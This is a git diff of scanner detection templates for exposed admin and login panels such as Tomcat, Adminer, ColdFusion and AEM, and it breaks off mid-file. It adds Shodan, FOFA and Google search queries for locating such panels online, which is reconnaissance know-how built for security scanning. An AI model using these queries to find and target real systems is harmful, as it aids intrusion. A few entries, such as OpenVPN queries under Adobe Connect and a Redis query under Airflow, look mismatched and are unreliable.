9b2a5c4d3e..a89d3de0d1 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -14,11 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Webclient" max-request: 1 - product: 3cx - shodan-query: http.title:"3CX Webclient" vendor: 3cx + product: 3cx + shodan-query: + - http.title:"3CX Webclient" + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + - http.favicon.hash:970132176 + google-query: + - intitle:"3CX Webclient" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index 9ab19d6a3b..aea1a4edc6 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -9,10 +9,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sierrawireless:airlink_mobility_manager:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ACEmanager" max-request: 1 - product: airlink_mobility_manager vendor: sierrawireless + product: airlink_mobility_manager + fofa-query: + - app="ACEmanager" + - app="acemanager" tags: panel,login,tech,acemanager,sierrawireless http: diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 1e1d7774d8..19ea69fdea 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: body="Login @ Reporter" max-request: 1 shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" tags: panel,login,acenet,acereporter http: diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 4a56df4878..075097244e 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -1,20 +1,20 @@ id: ackee-panel -info: - name: Ackee Panel - Detect - author: userdehghani - severity: info - description: | - self-hosted, node.js based analytics tool for those who care about privacy. - reference: - - https://ackee.electerious.com/ - - https://docs.ackee.electerious.com/ - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:-1495233116 - tags: panel,ackee,login,detect - +info: + name: Ackee Panel - Detect + author: userdehghani + severity: info + description: | + self-hosted, node.js based analytics tool for those who care about privacy. + reference: + - https://ackee.electerious.com/ + - https://docs.ackee.electerious.com/ + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:-1495233116 + tags: panel,ackee,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index aef9394078..5cd589e7ae 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -10,10 +10,10 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: title=="Acrolinx Dashboard" - google-query: inurl:"Acrolinx Dashboard" max-request: 1 shodan-query: http.title:"Acrolinx Dashboard" + fofa-query: title=="Acrolinx Dashboard" + google-query: inurl:"Acrolinx Dashboard" tags: acrolinx,panel http: diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 0ed0743974..a642e64f7e 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: app="ACTi-视频监控" + verified: true max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" - verified: true + fofa-query: app="ACTi-视频监控" tags: acti,panel,login,detect http: diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index f8f370d602..d23836b80d 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:activeadmin:activeadmin:*:*:*:*:ruby:*:*:* metadata: max-request: 1 - product: activeadmin vendor: activeadmin + product: activeadmin tags: panel,activeadmin http: diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index 14fcf8c1d5..46ad98de97 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: activemq vendor: apache + product: activemq + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: panel,activemq,apache http: diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 1fde288b23..582c056aac 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Acunetix" - verified: true tags: panel,acunetix http: diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 204507ff2e..159c1d8ada 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -6,9 +6,9 @@ info: severity: info description: AddOnFinance Portal Panel was detected. metadata: + verified: "true" max-request: 1 shodan-query: title:"AddOnFinancePortal" - verified: "true" tags: panel,addon,finance,detect http: diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index d49d385a39..2721f51b07 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -6,11 +6,22 @@ info: severity: info description: WS_FTP Ad Hoc panel was detected. metadata: - max-request: 1 - product: ws_ftp - shodan-query: http.title:"Ad Hoc Transfer" - vendor: progress verified: true + max-request: 1 + vendor: progress + product: ws_ftp + shodan-query: + - http.title:"Ad Hoc Transfer" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" + censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" tags: panel,wsftp,ad-hoc,detect,login,progress http: diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 784bfe9f8a..a1bf3da61d 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: loganalyzer vendor: adiscon + product: loganalyzer tags: adiscon,loganalyzer,syslog,exposure,panel http: diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8beeab25b4..848589f8d1 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -13,8 +13,16 @@ info: cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 741 - product: adminer vendor: adminer + product: adminer + shodan-query: + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,fuzz,adminer,login,sqli http: diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index e9543e8b03..132301fc15 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: - max-request: 8 - product: adminer - shodan-query: title:"Login - Adminer" - vendor: adminer verified: true + max-request: 8 + vendor: adminer + product: adminer + shodan-query: + - title:"Login - Adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,adminer http: diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index 48c5d1a42f..7a2b289842 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -8,8 +8,8 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: app="AdminSet" max-request: 1 + fofa-query: app="AdminSet" reference: - https://github.com/guhongze/adminset/ tags: adminset,panel diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index 1c53d8de87..a3f231c71a 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -12,9 +12,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe + product: coldfusion + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,adobe,coldfusion,edb http: diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index e8ce76b66a..ef465ca174 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: connect vendor: adobe + product: connect + shodan-query: http.title:"openvpn connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: adobe,panel,connect-central http: diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index 7cbef5bf80..305804d2c7 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -12,9 +12,15 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: experience_manager - shodan-query: http.title:"AEM Sign In" vendor: adobe + product: experience_manager + shodan-query: + - http.title:"AEM Sign In" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 40889640a4..189a8ca8b0 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index d44f6ecd73..e97a29effe 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe,sling http: diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 76e6a57eea..5366b7d2b5 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirCube Dashboard" - verified: true tags: panel,aircube http: diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index e0dee7f194..17523cdbb2 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1249285083 - verified: true tags: panel,aircube,ubiquiti http: diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index c7beb91b2f..2a8e11bb47 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -13,9 +13,20 @@ info: cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: airflow - shodan-query: title:"Sign In - Airflow" vendor: apache + product: airflow + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" tags: panel,apache,airflow,admin http: diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 4120df8a00..71b8f12080 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirNotifier" - verified: true tags: panel,airnotifier http: diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index 1c18156638..25af9fef39 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cloudtest vendor: akamai + product: cloudtest tags: panel,akamai http: diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 23c7abb560..04a6c1f98e 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:android:*:*:* metadata: max-request: 1 - product: alfresco vendor: alfresco + product: alfresco tags: alfresco,tech,panel http: diff --git a/http/exposed-panels/algonomia-panel.yaml b/http/exposed-panels/algonomia-panel.yaml index 5977b70308..ed444a32bb 100644 --- a/http/exposed-panels/algonomia-panel.yaml +++ b/http/exposed-panels/algonomia-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://algonomia.com/ metadata: - max-request: 1 verified: true - tags: tech,algonomia,detect + max-request: 1 + tags: tech,algonomia,detect,panel http: - method: GET diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index b8e48488e2..faa4e217e2 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -11,11 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - product: device_gui - shodan-query: title:"Allied Telesis Device GUI" - vendor: allied_telesis verified: true + max-request: 1 + vendor: allied_telesis + product: device_gui + shodan-query: + - title:"Allied Telesis Device GUI" + - http.title:"allied telesis device gui" + fofa-query: title="allied telesis device gui" + google-query: intitle:"allied telesis device gui" tags: panel,allied,allied_telesis http: diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index bb84700507..64299bb819 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:ambari:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ambari vendor: apache + product: ambari tags: panel,apache,ambari,exposure http: diff --git a/http/exposed-panels/amcrest-login.yaml b/http/exposed-panels/amcrest-login.yaml index 48ae7581eb..146e5c5f40 100644 --- a/http/exposed-panels/amcrest-login.yaml +++ b/http/exposed-panels/amcrest-login.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:amcrest:ip2m-853ew:*:*:*:*:*:*:*:* metadata: - google-query: intext:"amcrest" "LDAP User" max-request: 1 - product: ip2m-853ew - shodan-query: html:"amcrest" vendor: amcrest + product: ip2m-853ew + shodan-query: + - html:"amcrest" + - http.html:"amcrest" "ldap user" + - http.html:"amcrest" + google-query: + - intext:"amcrest" "LDAP User" + - intext:"amcrest" "ldap user" + fofa-query: + - body="amcrest" "ldap user" + - body="amcrest" tags: panel,camera,amcrest,edb http: diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index 33bacdeae1..bad170bb8d 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -10,8 +10,8 @@ info: cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ametys vendor: ametys + product: ametys tags: panel,ametys,cms http: diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index ffbe2c2331..51f9e366e1 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: amp - shodan-query: title:"AMP - Application Management Panel" - vendor: cubecoders verified: true + max-request: 1 + vendor: cubecoders + product: amp + shodan-query: + - title:"AMP - Application Management Panel" + - http.title:"amp - application management panel" + fofa-query: title="amp - application management panel" + google-query: intitle:"amp - application management panel" tags: panel,amp,cubecoders http: diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index 1efadb34ec..72ba6b1385 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: ampache - shodan-query: http.title:"For the Love of Music" - vendor: ampache verified: true + max-request: 3 + vendor: ampache + product: ampache + shodan-query: + - http.title:"For the Love of Music" + - http.title:"for the love of music" + fofa-query: title="for the love of music" + google-query: intitle:"for the love of music" tags: panel,ampache http: diff --git a/http/exposed-panels/amprion-gridloss-panel.yaml b/http/exposed-panels/amprion-gridloss-panel.yaml index 6ec032abcf..51f0f04c87 100644 --- a/http/exposed-panels/amprion-gridloss-panel.yaml +++ b/http/exposed-panels/amprion-gridloss-panel.yaml @@ -9,9 +9,10 @@ info: reference: - https://www.amprion.net/index-2.html metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,amprion,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index 910fd83a12..adbd593574 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" - verified: true tags: anaqua,login,panel http: diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index 61046db509..d58317efab 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Ansible Tower" max-request: 1 - product: ansible_tower - shodan-query: title:"Ansible Tower" vendor: redhat + product: ansible_tower + shodan-query: + - title:"Ansible Tower" + - http.title:"ansible tower" + google-query: + - intitle:"Ansible Tower" + - intitle:"ansible tower" + fofa-query: title="ansible tower" tags: panel,ansible,redhat http: diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index e104e72e0b..7e9ea40999 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jmeter - shodan-query: title:"Apache JMeter Dashboard" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: jmeter + shodan-query: + - title:"Apache JMeter Dashboard" + - http.title:"apache jmeter dashboard" + fofa-query: title="apache jmeter dashboard" + google-query: intitle:"apache jmeter dashboard" tags: apache,jmeter,panel http: diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index d34749989a..e8cd396ebe 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -10,9 +10,13 @@ info: cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: apisix vendor: apache - fofa-query: title="Apache APISIX Dashboard" + product: apisix + fofa-query: + - title="Apache APISIX Dashboard" + - title="apache apisix dashboard" + shodan-query: http.title:"apache apisix dashboard" + google-query: intitle:"apache apisix dashboard" tags: apache,apisix,panel,login,detect http: diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index b482f4fd1b..1396e99511 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - fofa-query: app="APACHE-MESOS" - max-request: 2 - product: mesos - shodan-query: http.title:"Mesos" - vendor: apache verified: true + max-request: 2 + vendor: apache + product: mesos + shodan-query: + - http.title:"Mesos" + - http.title:"mesos" + fofa-query: + - app="APACHE-MESOS" + - app="apache-mesos" + - title="mesos" + google-query: intitle:"mesos" tags: panel,apache,mesos http: diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index f7cd1ea593..adb6e5a994 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: tomcat - shodan-query: title:"Apache Tomcat" vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: panel,tomcat,apache http: diff --git a/http/exposed-panels/apigee-panel.yaml b/http/exposed-panels/apigee-panel.yaml index bd38bff268..ab86f4551c 100644 --- a/http/exposed-panels/apigee-panel.yaml +++ b/http/exposed-panels/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" - verified: true tags: panel,apigee,login http: diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index b28180205b..b3c2f57b8b 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: appsmith product: appsmith shodan-query: http.title:"appsmith" - vendor: appsmith - verified: true + fofa-query: title="appsmith" + google-query: intitle:"appsmith" tags: panel,appsmith http: diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index f571068619..4e017054a6 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: appspace - shodan-query: title:"Appspace" - vendor: appspace verified: true + max-request: 3 + vendor: appspace + product: appspace + shodan-query: + - title:"Appspace" + - http.title:"appspace" + fofa-query: title="appspace" + google-query: intitle:"appspace" tags: appspace,panel,detect http: diff --git a/http/exposed-panels/appsuite-panel.yaml b/http/exposed-panels/appsuite-panel.yaml index b47bd4d72d..40e37628f1 100644 --- a/http/exposed-panels/appsuite-panel.yaml +++ b/http/exposed-panels/appsuite-panel.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: open-xchange_appsuite - shodan-query: html:"Appsuite" - vendor: open-xchange verified: true + max-request: 1 + vendor: open-xchange + product: open-xchange_appsuite + shodan-query: + - html:"Appsuite" + - http.html:"appsuite" + fofa-query: body="appsuite" tags: panel,appsuite,detect,open-xchange http: diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index 4329c6b34e..071d3b6a73 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: appwrite - shodan-query: http.favicon.hash:-633108100 - vendor: appwrite verified: true + max-request: 2 + vendor: appwrite + product: appwrite + shodan-query: + - http.favicon.hash:-633108100 + - http.title:"sign in - appwrite" + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" + google-query: intitle:"sign in - appwrite" tags: panel,appwrite,detect http: diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index 45ed002380..91679567c9 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -12,10 +12,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Aqua Cloud Native Security Platform" + verified: true max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" - verified: true + google-query: intitle:"Aqua Cloud Native Security Platform" tags: panel,aqua,aquasec http: diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index 2b2ff1ee32..468a0071ff 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arangodb - shodan-query: http.title:"ArangoDB Web Interface" - vendor: arangodb verified: "true" + max-request: 1 + vendor: arangodb + product: arangodb + shodan-query: + - http.title:"ArangoDB Web Interface" + - http.title:"arangodb web interface" + fofa-query: title="arangodb web interface" + google-query: intitle:"arangodb web interface" tags: panel,arangodb,login http: diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index 3d7e132178..f003193952 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:esri:arcgis_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: arcgis_enterprise vendor: esri + product: arcgis_enterprise tags: docs,arcgis,cms,panel,esri http: diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index df59cea6e3..35107c252e 100644 --- 